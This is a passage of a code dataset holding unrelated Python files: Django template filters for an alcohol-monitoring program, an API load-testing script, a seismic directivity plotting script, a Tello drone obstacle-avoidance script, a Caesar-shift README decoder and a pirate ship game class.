"flask_login.login_required", "line_number": 196, "usage_type": "name"}]} +{"seq_id": 
"40595150126", "text": "from django import template\nfrom ..models import Abusebehav as Abuses\nfrom ..models import Mastscore as Masts\nfrom ..models import Psych\nimport re\n\nregister = template.Library()\n\n@register.filter(name='programtypes')\ndef programtype(progid):\n if progid == 1:\n return \"Random Alcohol Monitoring\"\n if progid == 2:\n return \"Continuous Trandermal Alcohol Monitoring\"\n if progid == 3:\n return \"Home Dentention and Random Alcohol Monitoring\"\n if progid == 4:\n return \"Home Detention Monitoring\"\n if progid == 5:\n return \"Home Detention and Secure, Continuous, Remote, Alcohol Monitoring\"\n if progid == 6:\n return \"Random Alcohol Monitoring ALT\"\n if progid == 7:\n return \"Sobriter\"\n if progid == 8:\n return \"Secure, Continuous, Remote, Alcohol Monitoring\"\n if progid == 9:\n return \"Ignition Interlock\"\n if progid == 10:\n return \"Alcohol Drug Screening\"\n if progid == 11:\n return \"Alcohol Drug Education\"\n if progid == 12:\n return \"Alcohol Drug Treatment\"\n if progid == 13:\n return \"Alcohol Drug Education UDDP\"\n if progid == 14:\n return \"Violation Diversion\"\n if progid == 15:\n return \"Revocation Review Packet\"\n if progid == 16:\n return \"Alcohol Education Diversion Program\"\n if progid == 17:\n return \"Domestic Violence\"\n if progid == 18:\n return \"PEACE (Anger Management)\"\n if progid == 19:\n return \"Domestic Violence PEACE Screening\"\n\n\n@register.filter(name='provider')\ndef provider(providerid):\n if providerid == 5:\n return \"Scottsdale City Court (SCC)\"\n\n\n@register.filter(name='status')\ndef status(actualenddate, noncomp):\n if not actualenddate and not noncomp:\n return \"Active\"\n if actualenddate:\n return \"Compliant\"\n if noncomp:\n return \"Non Compliant\"\n\n@register.filter(name='programAbuse')\ndef progamAbuse(program):\n abuses = Abuses.objects.filter(programid=program.programid)\n if abuses:\n return True\n else:\n return False\n\n@register.filter(name='programMast')\ndef progamMast(program):\n masts = Masts.objects.filter(programid=program.programid)\n if masts:\n return True\n else:\n return False\n\n@register.filter(name='programPsych')\ndef progamPsych(client):\n masts = Psych.objects.filter(clientid=client.userid)\n if masts:\n return True\n else:\n return False\n\n@register.filter(name='sec2Mins')\ndef secondsToMinutes(seconds):\n minutes = seconds / 60\n minutes = '%.0f'%(minutes)\n seconds = seconds % 60\n return \"{} minutes and {} seconds\".format(minutes, seconds)\n\n@register.filter(name='check')\ndef checked(livList, index):\n if livList[index] == \"1\":\n return \"checked\"\n else:\n return \"unchecked\"\n\n@register.filter(name='sub')\ndef substance(sub, index):\n split = sub.split(',')\n return split[index]\n\n@register.filter(name='mastResult')\ndef mastResult(mastScore):\n if mastScore < 3:\n return \"Low Risk Abuser\"\n if mastScore > 2 and mastScore < 6:\n return \"Abuse/early or middle problem drinker\"\n if mastScore > 5:\n return \"Alcoholic\"\n\n@register.filter(name='checkNo')\ndef checkedNo(livList, index):\n if livList[index] == \"0\":\n return \"checked\"\n else:\n return \"unchecked\"\n\n@register.filter(name='checkYes')\ndef checkedYes(livList, index):\n if livList[index] == \"1\":\n return \"checked\"\n else:\n return \"unchecked\"", "repo_name": "tjquinn1/roth", "sub_path": "cts/templatetags/cts_extras.py", "file_name": "cts_extras.py", "file_ext": "py", "file_size_in_byte": 3510, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, 
"dataset": "github-code", "pt": "86", "api": [{"api_name": "django.template.Library", "line_number": 7, "usage_type": "call"}, {"api_name": "django.template", "line_number": 7, "usage_type": "name"}, {"api_name": "models.Abusebehav.objects.filter", "line_number": 68, "usage_type": "call"}, {"api_name": "models.Abusebehav.objects", "line_number": 68, "usage_type": "attribute"}, {"api_name": "models.Abusebehav", "line_number": 68, "usage_type": "name"}, {"api_name": "models.Mastscore.objects.filter", "line_number": 76, "usage_type": "call"}, {"api_name": "models.Mastscore.objects", "line_number": 76, "usage_type": "attribute"}, {"api_name": "models.Mastscore", "line_number": 76, "usage_type": "name"}, {"api_name": "models.Psych.objects.filter", "line_number": 84, "usage_type": "call"}, {"api_name": "models.Psych.objects", "line_number": 84, "usage_type": "attribute"}, {"api_name": "models.Psych", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "28949292659", "text": "import os\nimport time\nimport datetime\nimport json\nimport traceback\nimport requests\nimport pymongo\nfrom multiprocessing import Pool\nfrom concurrent.futures import ThreadPoolExecutor\nfrom concurrent.futures import as_completed\nfrom concurrent.futures import wait\nfrom concurrent.futures import ALL_COMPLETED\n\n# 数据库操作\nclient = pymongo.MongoClient(host='localhost', port=27017)\ndb = client['stress_test']\ntask_col = db['tasks']\nresult_col = db['results']\n\n# 测试的url/header等信息\nurl_new = \"http://baidu.com/\"\nurl_result = \"http://baidu.com/\"\nheaders = {'content-type': 'text/plain; charset=utf-8'}\npayload = {'instance': {\n 'ip': '125.121.107.71',\n 'isp': '电信',\n 'country': '中国',\n 'province': '浙江',\n 'city': '杭州'\n}\n}\n\n\n# 处理json的类\nclass MyEncoder(json.JSONEncoder):\n\n def default(self, obj):\n \"\"\"\n 检查bytes类型的数据转为str类型\n \"\"\"\n if isinstance(obj, bytes):\n return str(obj, encoding='utf-8')\n return json.JSONEncoder.default(self, obj)\n\n\n# 处理任务的类\nclass TaskManager(object):\n\n def __init__(self):\n self.object_id = ''\n self.task_id = ''\n self.result_dict = {}\n\n def create_task(self):\n data = json.dumps(payload, cls=MyEncoder, indent=4)\n # data = json.dumps(payload)\n try:\n res = requests.post(url=url_new, headers=headers, data=data, timeout=10)\n if res.status_code not in [200]:\n print('request /api/v2/task/new status_code : ', res.status_code)\n return \"\"\n res_data = res.json()[\"data\"]\n add_res_data_mongodb = task_col.insert_one(res_data)\n self.object_id = add_res_data_mongodb.inserted_id\n self.task_id = res_data[\"task_id\"]\n except Exception as e:\n print(\"error : \", e)\n traceback.print_exc()\n return self.task_id\n\n @staticmethod\n def get_secondary_domain(url):\n secondary_domain = url.split(\"//\")[1].split(\".\")[0]\n return secondary_domain\n\n @staticmethod\n def get_target_cdn_str(url):\n target_cdn_str = url.split(\"|\")[0]\n return target_cdn_str\n\n @staticmethod\n def get_suffix_str(url):\n suffix_str = url.split(\"|\")[1]\n return suffix_str\n\n @staticmethod\n def get_trid_str(url):\n trid_str = url.split(\"&\")[6].split(\"=\")[1]\n return trid_str\n\n def handle_task(self):\n try:\n task = task_col.find_one({\"task_id\": self.task_id})\n except Exception as e:\n print(\"can not find task_id! 
--->\", e)\n return\n self.result_dict[\"task_id\"] = task[\"task_id\"]\n self.result_dict[\"create_time\"] = task[\"create_time\"]\n self.result_dict[\"completed_time\"] = str(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n self.result_dict[\"status\"] = \"Error\"\n self.result_dict[\"data_sequence\"] = \"target_cdn_str|suffix_str|trid_str\"\n data_list = []\n self.result_dict[\"data\"] = data_list\n for url_task in task[\"urls\"]:\n res_str = \"\"\n if url_task.split(\"|\")[0] == \"bvc\":\n res_str = self.get_secondary_domain(url_task) + '|' + self.get_suffix_str(\n url_task) + '|' + self.get_trid_str(url_task)\n data_list.append(res_str)\n else:\n res_str = self.get_target_cdn_str(url_task) + '|' + self.get_suffix_str(\n url_task) + '|' + self.get_trid_str(url_task)\n data_list.append(res_str)\n if self.result_dict:\n self.result_dict[\"status\"] = \"Done\"\n # result_col.insert_one(self.result_dict)\n return self.result_dict\n\n @staticmethod\n def callback_task(result_dict):\n data = json.dumps(result_dict)\n try:\n res = requests.post(url=url_result, data=data, timeout=10)\n if res.status_code not in [200, 202]:\n print('request /api/v2/result status_code : ', res.status_code)\n return \"\"\n except Exception as e:\n print(\"Callback task error! --->\", e)\n return res\n\n\n# 测试接口一的qps\ndef get_create_task_qps():\n data = json.dumps(payload, cls=MyEncoder, indent=4)\n start_tick = datetime.datetime.now()\n i = 0\n while 1:\n i = i + 1\n try:\n requests.post(url=url_new, headers=headers, data=data, timeout=10)\n except Exception as e:\n print(e)\n end_tick = datetime.datetime.now()\n if (end_tick - start_tick).seconds == 1:\n break\n return i\n\n\n# 测试接口二的qps\ndef get_callback_task_qps():\n query_args = {}\n projection_fields = {'_id': False}\n result_dict = result_col.find_one(query_args, projection=projection_fields)\n data = json.dumps(result_dict, cls=MyEncoder, indent=4)\n start_tick = datetime.datetime.now()\n i = 0\n while 1:\n i = i + 1\n try:\n requests.post(url=url_result, data=data, timeout=10)\n except Exception as e:\n print(e)\n end_tick = datetime.datetime.now()\n if (end_tick - start_tick).seconds == 1:\n break\n return i\n\n\n# 测试接口一\ndef task_create_task():\n tm = TaskManager()\n task_id = tm.create_task()\n if task_id:\n return 1\n else:\n print(\"create_task error!\")\n return -1\n\n\n# 测试接口二\ndef task_callback_task():\n query_args = {}\n projection_fields = {'_id': False}\n result_dict = result_col.find_one(query_args, projection=projection_fields)\n data = json.dumps(result_dict, cls=MyEncoder, indent=4)\n res = requests.post(url=url_result, data=data, timeout=10)\n if res.status_code in [200, 202]:\n return 1\n else:\n # print(\"callback_task error! 
---> \", res.status_code)\n return -1\n\n\n# 创建一个任务\ndef task_one():\n tm = TaskManager()\n task_id = tm.create_task()\n # task_id = tm.task_id = '45eb650db78348f1ac28d6388c372ab0'\n if task_id:\n result_dict = tm.handle_task()\n if result_dict:\n print(result_dict)\n callback_res = tm.callback_task(result_dict)\n print(\"callback_res : \", callback_res)\n return 1\n else:\n print(\"handle_task error!\")\n return -1\n else:\n print(\"create_task error!\")\n return -1\n\n\n# 用进程创建多个任务\ndef build_tasks_with_process(total_num, start_num):\n start_time = datetime.datetime.now()\n m_pool = Pool(total_num)\n for i in range(start_num):\n m_pool.apply_async(task_one(), args=(i,))\n m_pool.close()\n m_pool.join()\n end_time = datetime.datetime.now()\n execution_time = end_time - start_time\n print(\"execution_time : \", execution_time)\n\n\n# 用线程创建多个任务\ndef build_tasks_with_thread(max_workers, start_num):\n success_num = 0\n start_time = datetime.datetime.now()\n executor = ThreadPoolExecutor(max_workers)\n all_task = [executor.submit(task_callback_task, ) for i in range(start_num)]\n # all_task = [executor.submit(task_create_task, ) for i in range(start_num)]\n # all_task = [executor.submit(task_one, ) for i in range(start_num)]\n for task_res in as_completed(all_task):\n if task_res.result() == 1:\n success_num = success_num + 1\n else:\n pass\n wait(all_task, return_when=ALL_COMPLETED)\n end_time = datetime.datetime.now()\n execution_time = end_time - start_time\n print(\"success_num : \", success_num)\n print(\"execution_time : \", execution_time)\n return success_num, execution_time\n\n\ndef main():\n # 连续五次测试\n # result = []\n # for i in range(5):\n # res = build_tasks_with_thread(1000, 1000)\n # time.sleep(5)\n # result.append(res)\n # print(result)\n \n # 一次测试,输出结果\n result = build_tasks_with_thread(100, 100)\n print(result)\n\n # 测试pqs\n # print(\"/api/v2/task/new ---- qps :\", get_create_task_qps())\n # print(\"/api/v2/result ---- qps :\", get_callback_task_qps())\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "ETalienwx/Stress_test", "sub_path": "publish_task.py", "file_name": "publish_task.py", "file_ext": "py", "file_size_in_byte": 8140, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pymongo.MongoClient", "line_number": 15, "usage_type": "call"}, {"api_name": "json.JSONEncoder", "line_number": 35, "usage_type": "attribute"}, {"api_name": "json.JSONEncoder.default", "line_number": 43, "usage_type": "call"}, {"api_name": "json.JSONEncoder", "line_number": 43, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 58, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 68, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 99, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 99, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 121, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 123, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 135, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 135, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 140, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 143, "usage_type": "call"}, {"api_name": 
"datetime.datetime", "line_number": 143, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 154, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 155, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 155, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 160, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 163, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 163, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 185, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 186, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 216, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 216, "usage_type": "attribute"}, {"api_name": "multiprocessing.Pool", "line_number": 217, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 222, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 222, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 230, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 230, "usage_type": "attribute"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 231, "usage_type": "call"}, {"api_name": "concurrent.futures.as_completed", "line_number": 235, "usage_type": "call"}, {"api_name": "concurrent.futures.wait", "line_number": 240, "usage_type": "call"}, {"api_name": "concurrent.futures.ALL_COMPLETED", "line_number": 240, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 241, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 241, "usage_type": "attribute"}]} +{"seq_id": "34501498391", "text": "import argparse\nfrom pathlib import Path\n\nfrom qcore import nhm\nfrom gmhazard_calc import gm_data, directivity\nfrom gmhazard_calc.im import IM, IMType\n\n\ndef bea20_directivity_plots(\n fault_name: str, output_dir: Path, period: float = 3.0, grid_space: int = 100\n):\n \"\"\"\n Creates 6 plots to show total directivity effects for a given fault with a single hypocentre\n\n Parameters\n ----------\n fault_name: str\n Name of the fault to produce plots for\n output_dir: Path\n Path to the location of the output plot directory\n period: float, optional\n Float to indicate which period to extract from fD to get fDi\n grid_space: int, optional\n The grid spacing to use for generating directivity and to show resolution for plots\n \"\"\"\n im = IM(IMType.pSA, period=period)\n ens = gm_data.Ensemble(\"v20p5emp\")\n branch = ens.get_im_ensemble(im.im_type).branches[0]\n nhm_dict = nhm.load_nhm(branch.flt_erf_ffp)\n\n fault, site_coords, planes, lon_lat_depth, x, y = directivity.utils.load_fault_info(\n fault_name, nhm_dict, grid_space\n )\n nominal_strike, nominal_strike2 = directivity.calc_nominal_strike(\n lon_lat_depth\n )\n\n plane_index = [i for i, plane in enumerate(planes) if plane[\"shyp\"] != -999.9][0]\n\n fdi, (\n phi_red,\n predictor_functions,\n other,\n ) = directivity.directivity._compute_directivity_effect(\n lon_lat_depth,\n planes,\n plane_index,\n site_coords,\n nominal_strike,\n nominal_strike2,\n fault.mw,\n fault.rake,\n [period],\n )\n\n s2 = other[\"S2\"].reshape((100, 100))\n f_s2 = predictor_functions[\"fs2\"].reshape((100, 100))\n f_theta = predictor_functions[\"ftheta\"].reshape((100, 100))\n f_g = predictor_functions[\"fG\"].reshape((100, 100))\n f_dist = 
predictor_functions[\"fdist\"].reshape((100, 100))\n fdi = fdi.reshape((100, 100))\n\n directivity.validation.plots.validation_plot(\n x,\n y,\n s2,\n f_s2,\n f_theta,\n f_g,\n f_dist,\n fdi,\n lon_lat_depth,\n output_dir,\n )\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"fault\", type=str)\n parser.add_argument(\"output_dir\", type=Path)\n parser.add_argument(\"--period\", type=float, default=3.0)\n parser.add_argument(\"--grid_space\", type=int, default=100)\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n bea20_directivity_plots(args.fault, args.output_dir, args.period, args.grid_space)\n", "repo_name": "ucgmsim/gmhazard", "sub_path": "calculation/gmhazard_calc/gmhazard_calc/directivity/validation/bea20_validation_plot.py", "file_name": "bea20_validation_plot.py", "file_ext": "py", "file_size_in_byte": 2577, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pathlib.Path", "line_number": 10, "usage_type": "name"}, {"api_name": "gmhazard_calc.im.IM", "line_number": 26, "usage_type": "call"}, {"api_name": "gmhazard_calc.im.IMType.pSA", "line_number": 26, "usage_type": "attribute"}, {"api_name": "gmhazard_calc.im.IMType", "line_number": 26, "usage_type": "name"}, {"api_name": "gmhazard_calc.gm_data.Ensemble", "line_number": 27, "usage_type": "call"}, {"api_name": "gmhazard_calc.gm_data", "line_number": 27, "usage_type": "name"}, {"api_name": "qcore.nhm.load_nhm", "line_number": 29, "usage_type": "call"}, {"api_name": "qcore.nhm", "line_number": 29, "usage_type": "name"}, {"api_name": "gmhazard_calc.directivity.utils.load_fault_info", "line_number": 31, "usage_type": "call"}, {"api_name": "gmhazard_calc.directivity.utils", "line_number": 31, "usage_type": "attribute"}, {"api_name": "gmhazard_calc.directivity", "line_number": 31, "usage_type": "name"}, {"api_name": "gmhazard_calc.directivity.calc_nominal_strike", "line_number": 34, "usage_type": "call"}, {"api_name": "gmhazard_calc.directivity", "line_number": 34, "usage_type": "name"}, {"api_name": "gmhazard_calc.directivity.directivity._compute_directivity_effect", "line_number": 44, "usage_type": "call"}, {"api_name": "gmhazard_calc.directivity.directivity", "line_number": 44, "usage_type": "attribute"}, {"api_name": "gmhazard_calc.directivity", "line_number": 44, "usage_type": "name"}, {"api_name": "gmhazard_calc.directivity.validation.plots.validation_plot", "line_number": 63, "usage_type": "call"}, {"api_name": "gmhazard_calc.directivity.validation", "line_number": 63, "usage_type": "attribute"}, {"api_name": "gmhazard_calc.directivity", "line_number": 63, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 78, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 80, "usage_type": "name"}]} +{"seq_id": "25160798998", "text": "from time import sleep\nimport cv2\nimport numpy as np\nimport os\nimport socket\nimport threading\nimport queue\n \nq = queue.LifoQueue()\n \nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ntello_address = ('192.168.10.1', 8889)\nsock.bind(('0.0.0.0', 9000))\nprint(\"Connected\")\n \n \ntestmode = 1 # 1 or 2 for testing features\nStepSize = 5\npreviousDirection = \"\"\nmsg = ''\n \n \nprint(\"Command\")\nmsg = \"command\"\nmsg = msg.encode()\nsent = sock.sendto(msg, tello_address)\nsleep(2)\n \nprint(\"Streamon\")\nmsg = \"streamon\"\nmsg = msg.encode()\nsent = sock.sendto(msg, tello_address)\nsleep(2)\n \n 
\ntry:\n if not os.path.exists('data'):\n os.makedirs('data')\nexcept OSError:\n print ('Error: Creating directory of data')\n \nif testmode == 1:\n F = open(\"./data/imagedetails.txt\",'a')\n F.write(\"\\n\\nNew Test \\n\")\n \n \ndef forward():\n msg = \"forward 50\"\n msg = msg.encode()\n sent = sock.sendto(msg, tello_address)\n print(\"Going forward\")\n sleep(3)\n \ndef right():\n msg = \"cw 90\"\n msg = msg.encode()\n sent = sock.sendto(msg, tello_address)\n print (\"Going right\")\n sleep(3)\n \ndef left(): \n msg = \"ccw 90\"\n msg = msg.encode()\n sent = sock.sendto(msg, tello_address)\n print (\"Going left\")\n sleep(3)\n \n# Not currently used\ndef backward(): \n msg = \"backward 50\"\n msg = msg.encode()\n print (\"Going backwards\")\n sent = sock.sendto(msg, tello_address)\n sleep(3) \n \ndef land():\n msg = \"land\"\n msg = msg.encode()\n sent = sock.sendto(msg, tello_address)\n print(\"Landing\")\n \n \ndef getChunks(l, n):\n a = []\n \n for i in range(0, len(l), n): \n \n a.append(l[i:i + n])\n \n return a\n \n \ndef Receive():\n currentFrame = 0\n didTakeoff = False\n \n while True:\n \n if didTakeoff == False:\n \n print(\"takeoff\")\n msg = \"takeoff\"\n msg = msg.encode()\n sent = sock.sendto(msg, tello_address)\n sleep(5)\n \n # Uncomment to have the drone start higher up\n # print(\"up\")\n # msg = \"up 75\"\n # msg = msg.encode()\n # sent = sock.sendto(msg, tello_address)\n # sleep(5)\n \n didTakeoff = True\n \n name = './data/frame' + str(currentFrame) + '.jpg'\n print ('Creating...' + name)\n \n frame = q.get()\n img = frame.copy()\n \n blur = cv2.bilateralFilter(img,9,40,40) \n edges = cv2.Canny(blur,50,100) \n \n img_h = img.shape[0] - 1 \n img_w = img.shape[1] - 1 \n \n EdgeArray = []\n \n for j in range(0,img_w,StepSize): \n \n pixel = (j,0)\n \n for i in range(img_h-5,0,-1):\n \n if edges.item(i,j) == 255:\n \n pixel = (j,i) \n break \n \n EdgeArray.append(pixel) \n \n \n for x in range(len(EdgeArray)-1):\n \n cv2.line(img, EdgeArray[x], EdgeArray[x+1], (0,255,0), 1)\n \n \n for x in range(len(EdgeArray)):\n \n cv2.line(img, (x*StepSize, img_h), EdgeArray[x], (0,255,0), 1)\n \n \n chunks = getChunks(EdgeArray,int(len(EdgeArray)/3))\n \n c = []\n \n for i in range(len(chunks)-1): \n \n x_vals = []\n y_vals = []\n \n for (x,y) in chunks[i]:\n \n x_vals.append(x)\n y_vals.append(y)\n \n \n avg_x = int(np.average(x_vals))\n avg_y = int(np.average(y_vals))\n \n c.append([avg_y,avg_x]) \n \n cv2.line(frame, (480,720), (avg_x,avg_y), (255,0,0), 2)\n \n #print(\"C: \", c)\n forwardEdge = c[1]\n print(\"Forward Edge[0]: \", forwardEdge[0])\n \n cv2.line(frame, (480,720), (forwardEdge[1], forwardEdge[0]), (0,255,0), 3)\n cv2.imwrite(name, frame)\n \n y = (min(c))\n #print(\"y[1]: \", y[1])\n \n if forwardEdge[0] > 550: # Can change num to make the drone react closer or farther from object\n \n if y[1] < 310:\n \n if previousDirection == \"right\": \n right()\n direction = \"right\"\n \n else:\n left()\n direction = \"left\"\n \n else: \n \n if previousDirection == \"left\": \n left()\n direction = \"left\"\n \n else: \n right()\n direction = \"right\"\n \n else:\n forward()\n direction = \"forward\"\n \n previousDirection = direction\n \n if testmode == 1:\n F.write (\"frame\" + str(currentFrame)+ \".jpg\" + \" | \" + str(c[0]) + \" | \" + str(c[1]) + \" | \" + direction + \"\\n\") \n currentFrame += 1\n \n if testmode == 2:\n cv2.imshow(\"frame\",frame)\n cv2.imshow(\"Canny\",edges)\n cv2.imshow(\"result\",img)\n \n \nif __name__ == '__main__':\n \n p1 = 
threading.Thread(target=Receive)\n p1.start()\n \n cap = cv2.VideoCapture(\"udp://@0.0.0.0:11111?overrun_nonfatal=1&fifo_size=50000000\")\n while True:\n try:\n ret, frame = cap.read()\n if ret:\n q.put(frame)\n cv2.imshow('Tello', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n land()\n os._exit(1)\n except Exception as err:\n print(err)\n \n cap.release()\n cv2.destroyAllWindows()", "repo_name": "Steven308/TelloCollisionAvoidance", "sub_path": "TelloCA.py", "file_name": "TelloCA.py", "file_ext": "py", "file_size_in_byte": 5427, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "queue.LifoQueue", "line_number": 9, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 11, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 11, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 11, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 27, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 38, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 59, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 66, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 74, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 105, "usage_type": "call"}, {"api_name": "cv2.bilateralFilter", "line_number": 122, "usage_type": "call"}, {"api_name": "cv2.Canny", "line_number": 123, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 146, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 170, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 174, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 180, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 181, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 219, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 220, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 221, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 226, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 229, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 235, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 236, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 238, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 243, "usage_type": "call"}]} +{"seq_id": "27750219782", "text": "import requests\n\n# get a readme from https://github.com/pymarcus/daemonium\n\n\ndef get_readme():\n url = 'https://raw.githubusercontent.com/pymarcus/daemonium/master/README.md'\n response = requests.get(url)\n return response.text\n\n\ndef get_last_line(readme):\n lines = readme.split('\\n')\n return lines[-4].replace('
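The Tello script in the record above reads previousDirection inside Receive() and also assigns it later in the same function; Python therefore treats the name as local, and the first comparison raises UnboundLocalError before any steering happens. Factoring the decision into a pure function that takes and returns the state avoids the scoping trap; a sketch preserving the record's thresholds:

def choose_direction(forward_edge_y, min_edge_x, previous_direction,
                     near_threshold=550, left_boundary=310):
    """Return 'forward', 'left' or 'right' from the edge measurements."""
    if forward_edge_y <= near_threshold:
        return "forward"  # nothing close enough ahead, keep flying
    if min_edge_x < left_boundary:
        # stick with an ongoing right turn to avoid oscillating
        return "right" if previous_direction == "right" else "left"
    # mirror case: stick with an ongoing left turn
    return "left" if previous_direction == "left" else "right"

# in Receive(): direction = choose_direction(forwardEdge[0], y[1], previousDirection)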
', '').replace('
', '').strip()\n\n\ndef decrypt_cesar(cypher, shift):\n alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n decrypted = ''\n for char in cypher:\n if char in alphabet:\n decrypted += alphabet[(alphabet.index(char) +\n shift) % len(alphabet)]\n else:\n decrypted += char\n return decrypted\n\n\nif __name__ == '__main__':\n readme = get_readme()\n last_line = get_last_line(readme)\n print(last_line)\n for i in range(0, 26):\n print(decrypt_cesar(last_line, i))\n", "repo_name": "JuanIWK3/security", "sub_path": "security/daemonium/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 900, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}]} +{"seq_id": "25485398552", "text": "import json\n\n\nclass Ship:\n \"\"\"defines a single instance of a ship\"\"\"\n def __init__(self, user):\n self.captain = user\n self.ship_name = user + \"\\'s ship\"\n self.cannons = 1\n self.crew = 1\n self.armor = 1\n self.sails = 1\n self.hull = 110\n\n self.gold = 0\n\n self.position = 0\n self.win = 0\n self.loss = 0\n self.x = 0\n self.y = 0\n\n #self.parts_amt = [self.cannons, self.crew, self.armor, self.sails]\n def info(self):\n \"\"\"returns a str with basic parameters of the ship\"\"\"\n\n infostr = '\\n'.join([str(self.cannons), str(self.crew), str(self.armor), str(self.sails)])\n \"\"\"\n infostr = \"This level {6} ship is captained by {4} \\nIt has {0} cannons, {1} crew, {2} armor, and {3} sails \\n\"\\\n \"Its coffers are holding {5} gold\".\\\n format(self.cannons, self.crew, self.armor, self.sails, self.captain, self.gold, self.level())\n \"\"\"\n return infostr\n\n def level(self):\n \"\"\"returns level of ship based on its primary features\"\"\"\n ship_level = int((self.cannons + self.crew + self.armor + self.sails) / 1) - 3\n return int(ship_level)\n\n def upgrade(self, parameter, amount, cost=0):\n \"\"\"updates the parameters of the ship and subtracts the cost\"\"\"\n if parameter == \"cannons\":\n self.cannons += amount\n elif parameter == \"crew\":\n self.crew += amount\n elif parameter == \"armor\":\n self.armor += amount\n elif parameter == \"sails\":\n self.sails += amount\n else:\n return False\n\n self.gold -= cost\n\n self.update()\n return True\n\n def upgrade_costs(self):\n info = []\n for part in [self.cannons, self.crew, self.armor, self.sails]:\n info.append(str(int(100 + float((part**1.2) * 20))))\n infostr = '\\n'.join(info)\n return infostr\n\n def repair_hull(self):\n self.hull = 100 + self.armor * 5 + self.sails * 5\n\n def damage_hull(self, damage):\n self.hull -= damage\n\n def to_dict(self):\n \"\"\"creates a dict from ship params\"\"\"\n return {\n 'captain': self.captain,\n 'ship_name': self.ship_name,\n 'cannons': self.cannons,\n 'crew': self.crew,\n 'armor': self.armor,\n 'sails': self.sails,\n 'gold': self.gold,\n 'win': self.win,\n 'loss': self.loss,\n 'x': self.x,\n 'y': self.y\n }\n\n def from_dict(self, json_data=None):\n \"\"\"creates a ship based on a dict\"\"\"\n if json_data is None:\n return None\n\n self.captain = json_data['captain']\n self.ship_name = json_data['ship_name']\n self.cannons = json_data['cannons']\n self.crew = json_data['crew']\n self.armor = json_data['armor']\n self.sails = json_data['sails']\n self.gold = json_data['gold']\n self.win = json_data['win']\n self.loss = json_data['loss']\n self.x = json_data['x']\n self.y = 